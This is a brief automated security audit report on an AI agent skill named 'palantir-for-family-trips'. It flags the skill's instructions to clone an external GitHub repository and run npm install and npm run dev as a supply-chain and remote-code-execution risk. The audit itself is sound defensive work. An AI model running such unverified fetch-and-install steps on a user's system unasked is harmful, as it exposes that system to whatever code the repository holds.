palantir-for-family-trips
Warn
Audited by Gen Agent Trust Hub on Apr 15, 2026
Risk Level: MEDIUMEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill instructs the user to download an entire codebase from a third-party GitHub repository (
https://github.com/andrewjiang/palantir-for-family-trips.git). This source is external and unverified, presenting a supply chain risk if the repository content is malicious or compromised. - [COMMAND_EXECUTION]: The setup process requires running several shell commands, including
npm installandnpm run dev. These commands execute scripts defined in the external repository'spackage.json, which could lead to unauthorized actions on the local system. - [REMOTE_CODE_EXECUTION]: By combining the cloning of a remote repository with a full package installation (
npm install), the skill effectively allows for the execution of remote code from an external source.
Audit Metadata